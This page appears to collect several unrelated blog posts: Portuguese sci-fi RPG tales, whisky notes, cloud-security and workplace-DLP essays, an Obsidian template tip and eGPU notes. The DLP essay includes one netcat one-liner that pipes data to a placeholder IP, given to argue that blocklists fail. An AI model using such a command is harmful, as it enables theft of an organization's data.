Infosec Press

Reader

Read the latest posts from Infosec Press.

from Sirius

Neste conto, um peregrino vindo de outro mundo alerta um humano do que está por vir. Imagem dos jardins de uma civilização extraterrena Não estamos sozinhos no universo, embora grandes distâncias separem os mundos habitados por vidas que se estabelecem em sociedades desenvolvidas tecnologicamente, inclusive em nossa galáxia.

Além disso, a distância não é tudo que nos separa, também há o momento. Imagine quantas sociedades desenvolvidas já existiram antes das nossas e já se extinguiram? Seja de modo provocado e inconsequente – como no caso humano, ao ser subjugada por classes sociais que impõem um sistema capitalista, que destrói o ambiente natural e vai condenando as suas existências – seja em decorrência de uma catástrofe natural ou guerras?! Imagine quantas sociedades ainda se desenvolverão milhões ou bilhões de anos após nossas civilizações não existirem mais?

As questões de distância e momento, todavia, não são um grande problema para civilizações mais avançadas que as nossas. Até mesmo nós, gunídeos, já nos desenvolvemos a ponto de aproveitarmos de maneira plena a energia de nosso planeta, bem como começamos a encontrar soluções para que nossas vidas, ou pelo menos nossas consciências, sejam longevas o suficiente para acompanhar o tempo de existência de nossa galáxia.

Acredito que um problema ainda maior seja o choque entre os diferentes modos e pontos de vista das civilizações desenvolvidas, que possuem condições de exterminar umas às outras em eventuais conflitos ou guerras.

Evidentemente as civilizações desenvolvidas não são homogêneas. Na terra temos apenas humanos, como única espécie tecnológica, que guerreia nos conflitos imperialistas por mais recursos, rotas comerciais e poder, para que consigam desenvolver suas economias capitalistas.

Em Gunes não há apenas uma espécie, mas seis. É como se os homo sapiens ainda convivessem com outras espécies humanas já extintas, como os Neandertais.

Entre as raças gunídeas, destacam-se em tecnologia e poder os Luminos e as Nychtar, convivendo em um armistício selado há mais de três mil anos.

Assim como na terra, em que os Estados que possuem tecnologia nuclear não entram diretamente em guerra, por conta da destruição mútua assegurada, os conflitos em Gunes foram cessados, tendo o planeta se tornado um grandioso santuário cujo meio ambiente é diligentemente preservado, possuindo áreas de habitação bem definidas para o uso das seis raças, geridas por um conselho do qual todas participam.

Já superamos desafios como a fome, a miséria, a exploração do trabalho gunídeo, a opressão dos animais sencientes, e outras formas de abusos entre os gunídeos, mas ainda existe uma guerra fria que se estende para a corrida espacial.

Por causa dos Luminos, meu povo, do qual sou um proscrito, muitas civilizações se encontram ameaçadas, visto que nossa cultura nos define como os portadores da luz e da razão universal.

Os luminos acreditam que estão predestinados a governar o cosmos pela razão, verdade e justiça. E o que é verdade ou justiça? Eu não sei! A não ser que conversemos sobre noções particulares e relativas do que penso ser justo ou verdadeiro. Mas os Luminos, em geral, possuem certeza absoluta de que detêm tais virtudes e que em breve estarão livres das “amarras das trevas” impostas pela tirania Nychta. A guerra voltará em algum momento.

Os Luminos surgiram de povos nômades, nos desertos de Gunes, quando os céus já eram abertos. Embora não fossem tão fortes quanto as Nychtar, uma raça mais antiga forjada na guerra, sempre foram lutadores extremamente habilidosos, diligentes, excelentes astrônomos e fervorosos filósofos religiosos, crédulos na divindade da radiância, que segundo nossos escritos sagrados é personificada em nossa estrela: Radiante.

Com o final das guerras existentes em Gunes e a firmação do armistício, os Luminos se dedicam a superar as tecnologias mais sofisticadas das Nychtar, os povos das trevas, que inclusive já dominam a antimatéria. Eles extraem recursos de outros planetas do sistema e erigiram uma cidade espacial que se alimenta diretamente da energia de nossa estrela.

Os Luminos são liderados por Akin e outros de nossa raça, chamados de Radiantes, considerados seres celestiais, como anjos, ante a sua experiência e cultivo de virtudes luminas. São considerados os mais proeminentes dentre os Luminos, que criaram um universo que abriga as suas consciências.

Este universo de que falo, cabe ressaltar, é um mundo virtual cuja arquitetura foi elaborada e arquitetada por Akin e os tais anjos, possuindo diversos planos ou círculos de existência.

Por meio do desenvolvimento da tecnologia da Alma, uma gema que possui tecnologia de computação quântica, os Luminos conseguem preservar sua consciência e memórias indefinidamente, podendo migrar sua mente, ou “espírito”, para corpos físicos, extremamente resistentes e poderosos, construídos por meio de nossa biotecnologia. A Alma garante também que suas consciências vivam e habitem a Radiância, o universo virtual dos Luminos.

Na Radiância, Luminos podem viver diversas vidas nos planos de existência elaborados por Akin. Há Luminos que vivem inteiramente na radiância e jamais precisaram retornar ao mundo real. Suas consciências são imortais, armazenadas nas Almas. Alguns vivem dezenas de vidas tendo seus espíritos testados por Akin e os Radiantes, cultivando o que eles acreditam ser as virtudes desejáveis da consciência. Existe um plano infernal para trazer dor e sofrimento aos indivíduos considerados pecadores e planos mais leves e felizes aos alegadamente puros de coração ou virtuosos. Com a superação de provações nas existências dentro da Radiância, os luminos mais virtuosos conseguem conservar ou até recuperar a memória de suas vidas passadas e se tornam além de almas imortais, plenamente conscientes de suas vidas na radiância e fora dela (caso vivam encarnados em corpos luminos do mundo real).

Sei disso pois por muito tempo fui um dos Radiantes de Akin. Antes de ser a Estrela Negra, vivi por mais de dois mil anos na Radiância e me tornei um dos arquitetos daquele falso mundo, que atualmente desprezo. Evidentemente tudo o que vivi e conheço é de extrema importância para Akin.

Embora tenha conseguido bloquear a transmissão de minha consciência para a Radiância, no caso de se apoderarem de minha Alma, que reside em meu corpo físico, Akin poderá ter acesso a minhas vivências e aos conhecimentos que obtive dentro e fora de seus domínios. Além disso, poderá apagar minhas memórias, colocando fim à minha existência ou simplesmente poderá me torturar eternamente em um plano infernal.

Sou o único Lumino que pode morrer, de fato, mas nada me faz tão feliz! Sinto-me, nesses últimos séculos, possuidor de uma liberdade que jamais possuí, com todos os problemas, desafios e breves alegrias que isso propicia.

Quando decidi fugir da Radiância, já sabia dos planos de Akin e de meus demais pares, Radiantes. Nós, Luminos, descobrimos uma civilização em estágio inicial de desenvolvimento, que forjava aço, canhões, arcabuzes, construía embarcações e cruzava grandes distâncias em seus oceanos, para conquistar, escravizar e matar seus próprios irmãos.

Esses se denominavam humanos, pois acreditavam ter se originado da terra, e habitavam um planeta azul, orbitando uma bela estrela anã amarela, que chamavam de Sol.

Tão logo foram descobertos, com um modo de vida tão predatório e cruel – que lembrava os demônios devoradores de gunídeos que governavam Gunes na era antiga – Akin e os Radiantes traçaram um projeto para livra-los de sua destruição mútua e a destruição de seu ambiente natural.

Como foram considerados incapazes de governar seu próprio destino e aproveitar a dádiva da vida que a divindade vos concedeu, foram eleitos para serem o primeiro povo a ser governado pelos Luminos.

Uma nova radiância começou a ser projetada para que suas consciências, consideradas incautas, pudessem habitar, afastando-os de sua existência terrena. Foi determinado que os humanos que se rebelassem contra o governo Lumino seriam sumariamente exterminados e os que aceitassem o arrebatamento do povo da luz, passariam por encarnações na nova Radiância, para purificar seus espíritos no desenvolvimento das virtudes até se tornarem aptos para o regresso ao seu mundo.

Soube, há alguns anos, que quando a humanidade obteve o conhecimento da energia proveniente da fissão nuclear e efetivamente a utilizou para dizimar milhares de vidas, os Luminos decidiram adiantar seu plano. Eles estão a caminho. O Juízo final se aproxima. Mas vocês não estarão sós.

#RPG #Contos #Fantasia #Ficção #CenárioDeCampanha

 
Leia mais...

from beverageNotes

This evening is very pleasant and a fine end to a pleasant day. A bit on the warm side, but nowhere near has hot as it has been the past couple of weeks.

Sitting on the patio, I'm having a post-dinner dram of Red Line Elements Amburana Small Batch (https://www.redlinebourbon.com/elements-1). I picked it up for $60 from a local joint. They have several brick and mortar locations, offering a wide variety of whiskies and wine, along with smaller selections of beers, cheeses, and chocolates.

This is my second bottle and I'm a fan. The 103 proof warrants an ice cube or two and requires an “easing in” to get the bouquet—spicy caramel apple pie. That's my summation of the experience. I love it!

There's cinnamon and cloves. Hints of orange.

This offering is non-chill filtered and having learned more about the implications, I can pick out how it is not as 'thin' as Irish or Scottish whiskies.

Some neighborhood deer are in my backyard now, checking me out. The doe is chomping on some honeysuckle, which I would love to have eaten to the roots. One of the two fawns keeps laying down and neither seem very interested in eating. Maybe they're not quite old enough to have been weaned.

With this being my 3rd post, I'm probably not in any danger of creating a run on Red Line Elements Amburana Small Batch, but if you find it—it's limited to a couple of handfuls of states in distribution—and give it a go, please let me know what you think.

 
Read more...

from risibledog

William Pelley posing with dork-ass nazis of the Silver Legion (aka “Silver Shirts”) in Redmond, WA circa 1936.

Lately I keep thinking that it's a little surprising nobody has seized on the opportunity to make a recent flick about William Dudley Pelley. Maybe it's a little too on-the-nose? Might be a challenge to avoid having it scan as didactic / corny, and of course there's always the difficulty of avoiding the induction of dumbass anti-hero sympathy toward him in (maybe especially US) audiences, but the dude really has it all: – an anti-communist politic which is inseparable from antisemitism, – narcissistic, moderately-successful author & hollywood screenwriter who goes far-right, – heaps of proto-new-age woo bullshit, – a large-scale street fascist paramilitary organization (which finds particular traction in the Pacific Northwest), – high profile seditious conspiracy trial & conviction, – etc. (etc. etc. etc.)

Anyway, interesting prologue & historical context for a lot of things happening at the moment – and a pretty salient object lesson in the type of ostentatious (nonetheless very dangerous) clown that tends to spearhead any given fascist movement with demagoguery.

Knute Berger did a good little PBS bit on him not so long ago, worth checking out.

Bill Hader is good at wrecking the anti-hero tropes, so...

 
Read more...

from Armamix

I don't really think I need or want to start blogging again, but by all means. Here's a cheap tip to start things off: Test your backups regularly.

 
Read more...

from Sirius

A história de uma das personagens principais de uma ambientação de RPG.

Nuvens e estrelas

A narração deste conto é feita por um personagem chamado Zerah Sol Negro, considerado um traidor dos luminos, a raça da luz à qual também pertence. Ele conta a humanos sobre Pantea, sua aliada e principal líder contra as ações imperialistas de seu povo, os luminos, que pretendem reivindicar a Terra.

A história que vos conto é a saga de uma mulher da tribo das trevas, nascida em Numina, um mundo tão distante deste sistema solar que, mesmo viajando a uma velocidade próxima à da luz, exigiria décadas para ser alcançado.

Seu povo foi o primeiro dentre os gunídeos, nossa espécie, que guarda semelhanças aos humanos. Em razão de nossa mitologia, acreditava-se que nos originamos de uma planta mágica chamada guna. Esta germina na lama obscurecida dos lagos e se desenvolve até alcançar e superar a superfície da água, desabrochando nas sagradas flores de guna.

Dizem os nossos manuscritos sagrados mais antigos que, quando a tribo das trevas surgiu, os céus não podiam ser vistos, pois uma densa camada de nuvens encobria toda Numina. Os ancestrais de Pantea tiveram que sobreviver em um mundo hostil, dominado pela escuridão e a penumbra.

No início de nossa história o mundo era também governado por criaturas poderosas como os dragões e demônios. Assim, a adaptação dos nychtar se deu em meio a constantes lutas e riscos iminentes de extermínio de toda a população.

A pele e os cabelos dos nychtar são pretos como a noite, seus olhos tem a íris em um pálido prateado. Milênios de lutas tornaram seus corpos os mais resistentes e poderosos dentre os gunídeos.

As fêmeas nychtar, que tiveram de se adaptar a gestar sua prole em meio a lutas críticas pela sobrevivência, desenvolveram capacidade de regeneração incomparável a dos machos, embora estes sejam mais robustos.

Após uma longa era, a tribo das trevas estabeleceu uma sociedade guerreira, patriarcal e com capacidade de suportar e revidar às hostilidades de outras criaturas. Este processo, no entanto, não ocorreu sem traumas.

Embora as fêmeas tenham acompanhado os homens nas batalhas ancestrais, os mesmos as suplantavam em tamanho e força. O primeiro imperador nychta, Rinalk, realizou uma nova organização social que submetia às mulheres, destinando-as à reprodução e trabalhos penosos, alegando que era sua “natureza”, ante sua maior capacidade de suportar a dor e da propriedade de regeneração corporal.

Evidentemente houve resistência, mas as mulheres foram subjugadas pela força dos homens seguidores do Primeiro Imperador das Trevas e os ideais dessas guerreiras foi eficientemente combatido pela força e por ideologias religiosas, moralistas e pseudocientíficas a respeito do papel reservado à fêmea para a manutenção da espécie.

Muitas mulheres foram castigadas, mortas e torturadas no processo. Mas, embora tenham sido submetidas a um papel secundário na organização social, diferentemente do que ocorreu na história da espécie humana, não lhes foi inteiramente retirado o direito de produzir e obter conhecimentos a respeito da natureza.

Isso se deve ao caráter mítico da astronomia para as mulheres das trevas. Conta-se que o primeiro gunídeo a observar um astro foi uma mulher nychta, chamada Astrea.

As lendas declaram que Antarsia, o deus dragão das sombras, compadeceu-se das mulheres nychtar e arrefeceu as névoas que encobriam o mundo pela primeira vez. Astrea, então, viu pela primeira vez, durante a noite, o brilho encantador de uma estrela, a mais brilhante do firmamento noturno de Numina, que vocês humanos conhecem por Vega.

Para Astrea, Antarsia e os demais deuses lhes deram a missão maior de seu povo: alcançar os astros e viajar pela escuridão do firmamento. A astronomia tornou-se, assim, um dos conhecimentos mais caros e venerados pelas mulheres ancestrais daquele povo.

Milênios se passaram desde o primeiro império dos nychtar. Após o fim da idade das névoas, surgiram os ígneos, geos, aeros, hidros e luminos, gunídeos que estabeleceram uma hegemonia sobre as outras espécies por toda a Numina, prevalecendo sobre os dragões, demônios e demais raças que os ameaçavam.

Foi na era das batalhas pela hegemonia gunídea em que Pantea nasceu. Ela possuía ascendência da linhagem das estrelas e da linhagem das trevas, povos nychtar que descendem respectivamente das tribos de Astrea e de Rinalk.

Embora a guerra fosse um domínio masculino em sua época, teve que aprender o ofício do combate desde jovem, visto que a maior parte dos homens de sua cidade natal foram exterminados pelas legiões da imperatriz demônio do sul, Agrat.

Mesmo que não fosse comum uma fêmea ter autorização para liderar tropas nychtar à época, recebeu permissão do principado das trevas para ocupar cargos de liderança entre as tropas ígneas, fortes aliados que elevaram sua tecnologia militar, por meio de seus conhecimentos avançados em metalurgia.

Na aliança com os ígneos, Pantea ganhou destaque por sua força, agilidade, liderança e inteligência, mas, acima de tudo, por sua habilidade de lidar com os animais e montá-los, razão pela qual veio a se tornar líder da cavalaria ígnea da aliança.

Os bardos de seu povo fizeram versos sobre sua empatia com os animais e sobre sua espada de aço ígneo ceifadora de demônios.

Continua...

#RPG #Contos #Fantasia #Ficção #CenárioDeCampanha

 
Leia mais...

from Hyperscale Security

Any week in the security press proves that, generally, most companies and institutions have struggled to implement adequate or even basic security protections, despite best intentions and effort. While the move to the cloud has its own risks, whether for IaaS, PaaS and SaaS, it also provides the opportunity to outsource many security responsibilities to a cloud provider. The cloud platforms have many security and resiliency features baked in, and it can be reasonably argued that cloud providers can bring more resources and talent to bear and through economies of scale can do a better job than their customers can.

Aside from agility and flexibility of cloud solutions, for each organization individually, a move to the cloud can be a real security and resiliency net-benefit, compared to running critical systems themselves.

Decentralized Inadequacy vs Centralized Competence

To take just one example. Organizations notoriously struggle with keeping systems up-to-date, with new vulnerabilities being disclosed all the time. Rather than having to manage that yourself, using an always-at-the-latest-version SaaS solution is a real security benefit. For each organization separately, but also in aggregate.

We have to recognize, though, that there are not that many cloud providers that we all rely on. The companies listed in the Cloud Wars Top 10 – and full disclosure, I work for one – increasingly run the critical workloads that we all rely on as customers, employees and citizens. That means if anything goes significantly wrong the impact may be widespread.

We are moving from a situation where the likelihood of an individual failure in confidentiality, integrity or availability (CIA) is higher but the impact is contained, to one where the likelihood is lower, but the impact could be catastrophic.

The Colonial Pipeline Ransomware Attack led to the shutdown of all pipeline operations by the company and caused widespread fuel shortages across the US East Coast. What is often forgotten is that the ransomware affected the billing infrastructure, not the operational systems. With such administrative systems increasingly moving to the cloud, a major incident at a cloud provider affecting thousands of companies all at the same time would have devastating cascading effects throughout the global economy and the functioning of society.

Cloud as Critical Infrastructure

I think it is reasonable therefore to see cloud providers as critical infrastructure. The IT Sector in general already is designated as such, but these designations don't yet specifically focus on the unique and growing role of cloud providers within that sector as the providers of services to everybody else.

Cloud security has so far mostly focused on the consumer-side of the Shared Responsibility model in-the-cloud. Cloud providers have also started to recognize they have a responsibility to help their custoemrs run more securely. More recently, security issues of-the-cloud such as recorded in the Cloud Vulnerability Database have got more attention, showing that the cloud providers aren't perfect. A recent incident prompted a US Senator to criticize one of them for “negligent cybersecurity practices”.

It is time that cloud providers are held to a greater level of scrutiny on their own internal operations. If failure can have significant impact on the economy, the functioning of society, and even lives, we should expect similar oversight and consequences as in Utilities, Finance or Healthcare.

 
Read more...

from beverageNotes

Revisiting the Four Roses, while listening in and occasionally watching the USWNT play The Netherlands in the Women's World Cup. Go USA! (They are down by one at the half, as I write this.)

This will be a bottle kill. A more generous pour than I usually go for, but it was nearly empty.

My cold is mostly gone, but the flavors haven't changed much. I'm detecting a hint of anise or licorice on the nose—maybe it's the astringency. There's a hint of it in the back third of the sip, as well.

I've some chocolate covered bing cherries to go with the whisky and they complement it well. Having a sip just after the cherries accentuates some pipe tobacco and sweetness.

Overall, I like the whisky and would certainly have some if offered or if I received a bottle as a gift. It's not the best I've ever had. This is about $60/bottle, so I'd prefer picking up a Penelope Toasted, an Eagle Rare, or even a Kirkland BiB.

 
Read more...

from serialcomplainer

Everyone who works or has worked in a medium/big/large/huge/... company I am sure encountered a lot of occasions where the security measures set in place by the company were extremely annoying, a mix of intentional slow-downs, red-taping, bureaucracy and rituals.

This is no news, as a lot of regulations impose compliance against a number of frameworks, which often prescribe a bunch of security measures to be implemented. Security means controls, and controls can be implemented well and can be...just implemented. The problem with compliance is that you often find yourself walking a fine line between useful security measures to mitigate risk and protecting people (and the organization) and complete bullshit security theater which is essentially meant to just tick a box during an audit. The more the latter is annoying to the end-user (the unlucky working class who just wants to get its job done to earn a salary to have money to spend in their free time to forget about work), the more “security” is providing.

Another problem is that to comply with many different regulations, a lot of policies are needed. A LOT. Each policy has tons of sections, subsections, sub-subsections, and so on. These are often accepted/reviewed once a year, during that beautiful process in which hundreds or thousands of employees essentially sign off company policies that they barely read and when they actually read, they barely understand (because of how the policies are written, not because of them), in the same way that we all accept EULA when signing up to Facebook or whatever cool new social network young people use.

Either way, I digress. What is the problem with many policies? Well, there are a few:

  • Maintenance is hard. Reviewing policies is one of the most boring jobs ever, and when you have tons of them, keeping them all up-to-date to the point that they are relevant, is a challenge.
  • Even harder is to maintain a framework of policies. This means that policies need to all go in the same direction, they need to live in harmony with each other, they should not contradict each other.

Enters Workstation Security

One of the largest battlefield in which compliance, security theater, security, marketing from security companies, pleasure to make people miserable and other components meet each other is the security of the workstations for the employees.

To be honest, the last year has seen a rise in attacks involving the compromise of engineers workstations, besides the usual phishing attacks (which are “on the rise” every year for the last 10 years according to prestigious security publications), so all of this is not completely unfounded.

Anyway, usually every company has an “Acceptable Use Policy” (AUP) which states what you can and cannot do with your company device(s). This includes things like watching porn, gambling, playing games but also things like installing new software. Clearly the situation gets complicated when we are talking about workstations for engineers and tech workers in general: they generally need a lot of tools to get their job done or to do it in a more efficient way. However, this often conflicts with the common requirements of getting approval for every software installed.

Besides AUP, there is also another term that companies (mostly the ones that sell products to “prevent” it) love: DLP, Data Loss Prevention. This essentially means preventing you (the employee) from exfiltrating proprietary data of the company outside the company. Concretely this translates in things like blocking USB drives on workstations, blocking certain sites (like personal email, storage sites, etc.).

DLP is security theater. Here, I said it. In most companies DLP translates into a bunch of annoying rules that make the life of people working more annoying, without solving any problem at all, against even the slightly motivated and capable malicious user.

Let's not just make a rant though, let's make concrete examples. One of the most important DLP area is the network. To avoid that you (the bad employee) would go to Google drive and upload a beautiful zip with all the company data, organizations usually install a proxy in the corporate network. Alternatively, for those working remotely (but not only, of course), the company might enforce a VPN solution with DLP integrated. What this means is that every single network packet that employees send to the network, first need to pass through this proxy, where it gets decrypted, analyzed, filtered and then sent to the destination.

This technique also inspects HTTPs (TLS) traffic, since companies install by default in every workstation a CA certificate issued by the VPN provider, that is trusted for everything. In other words, if you go to https://mysite.org from your company workstation and inspect the certificate in the browser, you will see that the certificate is actually issued by your VPN provider.

So far, this makes sense, right? It is reasonable that on a company workstation you have no expectation of privacy (and this is another reason why you should NEVER, EVER use your work devices for anything else than work), and that traffic is inspected. Unfortunately, usually the “controls” don't stop here. For a man with a big hammer, everything looks like a nail. Once you pay big money for this kind of product, you want to start using all the beautiful features it offers, and the first – I guarantee you – is the category block. We are not talking about porn, gambling, etc., we are talking about calendar, emails, etc.

Once this solution is in place, it's common to see things like “only [whatever email provider your company use, say gmail] is allowed”. Then, if you try to go to mail.proton.me, you get a big error message that tells you that the page is blocked as it's an email application. Same if you go to outlook.com (if for some reason you chose to keep your emails there), and so on. The same applies to calendars, storage applications etc.

What is the problem here? The problem is that this is bullshit. Not in the sense that it doesn't have a rationale, but in the sense that it is pretty much like trying to empty the sea with a bucket. The only achievement of this is that Sarah in accounting will have more trouble organizing her life because she can't access her work calendar from her personal devices (of course!) nor her personal calendar from her work device. Or that John from marketing will need to jump 25 hoops to access a site needed to share data with a customer (who doesn't happen to use the same system as his company), usually by requesting some manual, temporary whitelist, with lots of approvals and time wasted. That's pretty much the only achievement, because there is just no way, NO WAY that whatever pricey solution you are buying, you are actually blocking all email, storage, calendar, etc. applications on earth (or better, on the Internet). It simply will not happen. Anybody can run a huge number of opensource or even custom software to do essentially whatever. You can host a pastebin service under your personal domain, you can access your personal Gitea instance, and a solution that works based on the domain alone to be in a list, especially a blocklist, is going to be extremely ineffective. You could achieve this only via an allow-list, but good luck figuring out a list of all the websites that everyone in the company requires to access.

In fact, usually there is always someone within a company that knows “something that works”, which they use to do their job better, and which technically violates a huge number of policies, but that “since it's not blocked” automatically feels like allowed (which makes sense, to some extent).

So here there are only 2 scenarios that matter:

  • Your super expensive network DLP-blockchain-AI-web3 technology can block network traffic which contains suspicious sensitive data.
  • Your super expensive network DLP-blockchain-AI-web3 technology cannot block network traffic which contains suspicious sensitive data.

If your solution falls in the first scenario: good job! You have a technical control that works and scales. At this point, there is no need anymore to block any site for anybody in the company, because if Sarah from accounting decided one day not to use her calendar to remember about her karate lesson, but to exfiltrate company data, this holy-grail of DLP would catch it and block it. It's unclear how this solution will work with things like code (that reasonably you will sometimes paste online for searches) or credit card data (when you are doing a legitimate purchase with your card, not exfiltrating credit cards), but I will leave this to the – I am sure – extremely expensive solutions.

If your solution falls into the second scenario, then you have no technical control. There is absolutely nothing you can do to prevent a user from doing cat | tar | nc IP port and sending whatever data she wants to whatever IP she controls. You also can't do anything if she can access a file upload service hosted at https://news.kitchen.cat, which likely won't be in any list. Or you can't do absolutely anything about one of the other millions of ways to exfiltrate data in a way to bypass a simple list of domains. If you are in this situation, what benefits does it give to block a negligible part of the internet? The only benefit is to prevent people from doing mistakes likes sending accidentally an email from their personal account instead than from their work one. Is this kind of scenario worth the nuisance to all the users for everything that is blocked? Maybe it is, maybe it is not, but this is essentially what the decision should be based on. If someone starts mentioning the risk of DLP in accessing your personal email, you know that's bullshit. Some malicious insider will find another way, while the well-meaning users will just obey the rules and get annoyed in the process.

A small parenthesis is due at this point. Every security control has some gaps. It's very rare, if not impossible, to have something 100% effective. The problem is that in this context we are not talking about a bypass for a control, but rather about a few ways that the control cannot be bypassed. The efficacy is so low, that it's like claiming to have restricted access to a field by putting a door in the middle of it: you didn't help a little, you wasted the wood.

In whichever scenario your solution falls, you need to realize that as a company your main control is administrative: a policy that states that you can't share the data, and if you do so, you will have legal troubles and will get fired. Of course this will not prevent anything, but it's basically all you got. Even the most sophisticated solution won't anyway prevent anybody from taking pictures of their screen and OCR the data at scale, so it's a lost battle anyway, you might as well not annoy the users in the process.

The Virtualization Issue

When talking about DLP, and workstation security in general, another topic is virtualization. Usually the organization requires to run a bunch of tools on each workstations, agents that monitor files, processes and the network (as the one discussed before). Obviously, if you decide to run a VM on your workstation, all the tools and agents will not be present, and therefore there is a security and a DLP risk.

The security risk is that your VM can be compromised and potentially infect your workstation as well (hypervisor vulnerabilities are rare but they exist). The DLP risk is that...you guessed it, inside the VM there are not those kind of agents which we talked about before. So you could be accessing whatever site you want, for example (this mostly apply for people working remotely, and not sitting in their corporate network, where the filtering can happen outside your machine).

For these reasons, the AUP sometiems forbids the use of VMs. This is where the beauty of the bureaucracy comes into play: many new companies (especially the hip and techie ones) are now using Apple devices (Macs) as their workstations, using tools like Jamf & similar, to replace the very common Windows or (among techies) Linux workstations.

Unfortunately, modern development is also extremely tied to containers, and an engineer who can't use Docker locally nowadays is going to initiate a mutiny. Because of this reason, Docker usage is generally allowed and necessary. The beautiful side of this is that on Mac Docker Desktop uses a Linux VM, even configured in a way which is way less isolated than a regular VM would be by default (unless explicitly made so). I would like to conduct a survey of how many Mac shops ban VMs but allow Docker, because that's hilarious. If you want to run a VM with host-only network to run some tool that you are not allowed to install in full isolation, you can't do it. But if you want to run any Docker image you want, with similar (let's not say worse) isolation, you can do it.

The policy says so.

 
Read more...

from beverageNotes

I'm finally on the other side of a cold. A couple of days were no good. Minor coughing today and a little sinus drainage, but most certainly on the mend. I wish for a drink, while a pizza is in the oven.

I have a dram of Four Roses Small Batch Select. It's non-chill filtered and is 104 proof. There is a wee string on the label, 331SFA2, which could be a lot identifier. (The 'S' could be a '5'. I needed more light to see for sure, but I'm largely indifferent to be sussed to get the needed lumens.)

I won the bottle in a bourbon raffle. Bottled lightening! (The Weller's Antique 107 was a pleasant discovery and will be another post.)

Without ice, the first sip is a bit harsh and hot. I usually add an ice cube to these higher proofs. I smell some cinnamon and fruit, maybe pear? Some caramel, too.

The heat hits at different places at different times through the sip. It hits the back of the palate and works its way forward. I taste some caramel and cinnamon.

I've been to several whisky tastings and during one with reps from Penelope, I learned non-chill filtered will leave behind some elements to a whisky that chill-filtered will remove. It changes the mouth feel. The feel on this one starts smooth and slightly more viscous than other spirits. I then feel velvet and the sip slips into a slightly rougher cloth.

Continuing on, I also taste butter. I'm reminded of Kerry Gold. I can still pick out some cinnamon, but there are other spices I can't quite put a finger on. Not quite pepper. I feel compelled to say cardamom, but I don't think that's right either.

Perhaps the next dram on another day.

 
Read more...

from risibledog

Recently I've been finding the combination of obsidian & the omnivore plugin to be quite a useful way of maintaining a database of info from articles (etc)!

Once you've got the plugin installed in your vault (you can also find it in Obsidian's “Community plugins” browser), you can edit the Article Template as you see fit.

I'm sure there are smoother ways of setting this up, but my template currently looks like this:

#Omnivore 
# {{{title}}}

[Read on Omnivore]({{{omnivoreUrl}}})
url:: [link]({{{originalUrl}}})

{{#highlights.length}}
<!--
## Highlights

{{#highlights}}
- hl:: >{{{text}}} {{#note}}^[*{{{note}}}*]{{/note}}
 {{#labels}} #{{name}} {{/labels}} 

{{/highlights}}
-->
{{/highlights.length}}

---
{{{content}}}

I have found that it works great with the dataview plugin. I make a new markdown file to serve as an index using this code block:

```dataview
table without id
	list(file.name, url) as "article", list(date_published, author, hl) as "info & excerpts"
from #Omnivore 
where date_published 
sort date_published desc, date_saved desc
```

This creates a table with a list of the articles sorted in reverse chronological order (ie. the most recent one is at the top), and includes any excerpts which you have highlighted in Omnivore.

It ends up looking like this:

I also edited the Article Template above so that any annotations I add to a highlight can be displayed as a footnote beneath the excerpt, like this:

Some of the articles you save will inevitably not have properly formatted date_published info — those are currently excluded from the above code block. I put another code block beneath that one which looks like this:

```dataview
table without id
	list(file.name, url) as "article", list(date_published, author, hl) as "info & excerpts"
from #Omnivore 
where date_published = null
sort date_published desc, date_saved desc
```

Omnivore also has an “edit info” option for each article saved, so if you'd like to move an article without date_published info into its proper spot in the table which is sorted by date, you can open it in a browser and edit the article's date info. (This date-editing option currently appears to only be available in a web browser, not on the mobile app.)

You can also make more specialized lists of this sort by using Omnivore's “tags” feature editing the line so it reads from #Omnivore and #[NewTag] – I have also found that Omnivore supports the use of nested tags, which can help narrow or broaden the specificity of various index tables :)


P.S. – if you want quick & easy access to the markdown articles via these index files, just remove the snippet of text which says without id from the code block. That will create an extra column which is a direct link to the markdown file, like this:

 
Read more...

from Kevin Neely's Security Notes

Finishing the POC

I ended part one with a working configuration, I proceeded to test some scenarios to make sure things were working correctly. For the most part, I connected the keyboard and mouse to the NUC through an old USB hub and directly connected the Ethernet cable to the NUC. The Thunderbolt cable connects the NUC to the #eGPU and the monitor is connected directly to the Nvidia card. As my testing progressed over the next couple of days, I was mostly happy with the results, but I also ran into a number of quirks and one really unlikely hardware malfunction.

My (Eventual) Build

I paired the Razer Core X Chrome with a recent (late 2020) Intel NUC I chose this one because they had great compattibility results in most of the articles I was reading, and I liked the USB hub and ethernet portt in the back of the device. In retrospect, I probably would have been better off with the plain Razer Core X. The hub’s functionality has been flaky in my experience, sometimes working with the Ubuntu NUC,

“image

Testing and Troubleshooting

NUC & eGPU experience

I encountered a few quirks during the proof-of-concept phase. For whatever reason, the NUC does not fully recognize the eGPU on every startup. This manifests in two ways described below

No login screen after boot

Sometimes, the display would update only as far as the startup messages, ending with checking the volume inodes. Moving the HDMI cable from the eGPU enclosure to the NUC itself showed the login screen once, but most often, it was impossible to login locally. I could either SSH in and reboot it or just long-press the power and turn back on.

System not actually using the GPU

The most common problem, and similar to the above, sometimes the system would startup, but immediately upon using the GUI, I could feel that something wasn’t right. The password echo dots took just a few parts of a second too long to appear. Dragging windows around was a choppy experience. Even though running nvidia-smi showed the card as recognized, it was clear that it was not being used as no processes had been assigned VRAM.

Every single time, a reboot fixes this issue. The way to prevent it is to not turn off the eGPU enclosure at night and leave it connected. However, the enclosure’s fan will run continuously and the lighting glows if one does this and that seems like a waste.

NUC power switch

Completely unrelated to the actual configuration and testing, but impacting the POC nonetheless was the power switch on my NUC going out. After a frustrating day of testing, I set everything aside -even unplugging all the cables- to give myself a break. Coming back the next morning with some fresh ideas, the NUC wouldn’t power on. I could see that it was receiving power (there’s an internal LED), but pressing the button did nothing.

Apparently, this is a common problem with NUC devices. Luckily, I was well within my three year warranty, so I opened a support ticket. I had found the likely fix online: resetting the CMOS, however, I could not unscrew the screws affixing the motherboard to the chasis. So, I opened a ticket, the agent said the same thing, but eventually I was able to RMA it. I have to say, Intel’s support team was great here.

Windows & eGPU experience

I haven’t yet upgraded my laptop or any other Windows system to something with Thunderbolt 3, so this is planned for the future.

Day to day experience

So far, the games have worked okay. That is to say that on an older NUC with a lower CPU (it’s purpose was mostly to have decent memory for many low-impact #Docker containers, and sufficient high-speed storage for database seeks) has been pretty good. This is my “workhose” system: something I expect to use for long-running, non-interactive jobs, and it seems to do them excellently. When the system

Games

